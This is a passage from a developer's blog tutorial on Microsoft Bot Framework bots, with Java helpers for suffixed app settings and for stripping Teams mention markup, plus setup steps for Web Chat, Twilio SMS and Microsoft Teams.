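/** Hypothetical lookup helper: resolves "name + suffix" against a settings map. */
final class SuffixedSettings {
    private final Map<String, String> settings;
    private final String suffix;

    SuffixedSettings(Map<String, String> settings, String suffix) {
        this.settings = settings;
        this.suffix = suffix == null ? "" : suffix;   // no suffix means the default bot
    }

    // Fail fast with the full key name so a typo in the portal is easy to spot.
    String get(String name) {
        String key = name + suffix;
        String value = settings.get(key);
        if (value == null || value.isEmpty()) {
            throw new IllegalStateException("Missing app setting: " + key);
        }
        return value;
    }

    public static void main(String[] args) {
        // Placeholder values only; real ids and secrets come from the Azure portal.
        Map<String, String> sample = Map.of(
                "MicrosoftAppId_wumpus", "wumpus-app-id",
                "MicrosoftAppType_wumpus", "MultiTenant",
                "MicrosoftAppId", "radio-app-id");

        SuffixedSettings wumpus = new SuffixedSettings(sample, "_wumpus");
        SuffixedSettings radio = new SuffixedSettings(sample, "");

        System.out.println(wumpus.get("MicrosoftAppId"));
        System.out.println(radio.get("MicrosoftAppId"));
    }
}
```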

Congratulations, you now have a bot! In the Azure portal, you can choose “Test in Web Chat” to give it a spin. It’s pretty easy to embed this chat experience into your web site as well (instructions here).

You can use the “Channels” tab to wire up your bot to additional services. I hooked Wumpus up to Twilio SMS using the instructions here. In brief:

  • Sign up for Twilio and get an SMS number.
  • Create a “TwiML” application on their portal and link it to the Bot Framework using the endpoint https://sms.botframework.com/api/sms.
  • Choose the Twilio channel in the Azure portal and paste in your TwiML application credentials.

That’s it! Just text “play” to 706-943-3865 and you’re off to the races.

Bots in Microsoft Teams

Connecting to Teams is conceptually similar to SMS, just a lot more fiddly.

First, enable the Microsoft Teams channel in your Bot Service configuration. This is pretty much just a checkbox and confirmation that this is a Commercial, not Government, bot.

Next, bop over to the Teams admin site at https://admin.teams.microsoft.com/ (if you’re not an admin you may need a hand here). Under “Teams Apps” / “Setup Policies” / “Global”, make sure that the “Upload custom apps” slider is enabled. Note that if you want to be more surgical about this, you can instead add a new policy with this option just for developers and assign it to them under “Manage Users.”

Finally, head over to https://dev.teams.microsoft.com/apps and create a new custom app. There are a lot of options here, but only a few are required:

  • Under “Basic Information”, add values for the website, privacy policy and terms of use. Any URL is fine for now, but they can’t be empty, or you’ll get mysterious errors later.
  • Under “App Features”, add a “Bot.” Paste your bot’s “Microsoft App Id” (the same one you used during the function app configuration) into the “Enter a Bot ID” box. Also check whichever of the “scope” checkboxes are interesting to you (I just checked them all).

Save all this and you’re ready to give it a try. If you want a super-quick dopamine hit, just click the “Preview in Teams” button. If you want to be more official about it, choose “Publish” / “Publish to org” and then ask your Teams Admin to approve the application for use. If you’re feeling really brave, you can go all-in and publish your bot to the Teams Store for anyone to use, but that’s beyond my pay grade here. Whichever way you choose to publish, once the app is in place you can start a new chat with your bot by name, or add it to a channel by typing @ and selecting “Get Bots” in the resulting popup. Pretty cool!

A caveat about using bots in channels: your bot will only receive messages in which it is @mentioned, which can be slightly annoying but net net probably makes sense. Unfortunately though, it is probably going to mess up your message parsing, because the mention is included in the message text (e.g., “<at>botname</at> real message.”). I’ve coded RadioBot to handle this by stripping out anything between “at” markers at line 454. Just another way in which you really do need to know what channel you’re dealing with.
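If you want to do the same in your own bot, a regex gets you most of the way. This is a minimal sketch, not the RadioBot code; the MentionStripper class and its method name are made up for illustration, and it assumes mentions always arrive wrapped in literal <at>…</at> markers as in the example above.

```java
import java.util.regex.Pattern;

/** Hypothetical helper: removes <at>…</at> mention markup from incoming message text. */
final class MentionStripper {

    // Reluctant match so two mentions in one message are removed separately;
    // DOTALL in case a display name ever contains a line break.
    private static final Pattern AT_MENTION =
            Pattern.compile("<at>.*?</at>", Pattern.CASE_INSENSITIVE | Pattern.DOTALL);

    static String stripMentions(String text) {
        if (text == null) {
            return "";
        }
        // Swap each mention for a space, then collapse the leftover whitespace.
        String withoutMentions = AT_MENTION.matcher(text).replaceAll(" ");
        return withoutMentions.replaceAll("\\s+", " ").trim();
    }

    public static void main(String[] args) {
        System.out.println(stripMentions("<at>botname</at> real message."));
    }
}
```

Note that this also collapses runs of whitespace in the rest of the message, which is fine for command parsing but worth skipping if your bot cares about exact spacing.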

Teams in particular has a whole bunch of other capabilities and restrictions beyond what you’ll find in the vanilla Bot Framework. It’s worth reading through their documentation and in particular being aware of the Teams-specific stuff you’ll find in TeamsChannelData.

We made it!

Well that was a lot; kind of an anti-quickstart. But if you’ve gotten this far, you have a solid understanding of how the Bot Framework works and how the pieces fit together, start to finish. There is a bunch more we could dig into (for instance check out the Adaptive Card interfaces in RadioBot here and here) — but we don’t need to, because you’ll be able to figure it out for yourself. Teach a person to fish or whatever, I guess.

Anyhoo, if you do anything cool with this stuff, I’d sure love to hear about it, and I’m happy to answer questions if you get stuck as well. Beyond that, I hope you’ll enjoy some good conversations with our future robot overlords, and I’ll look forward to checking in with another post soon!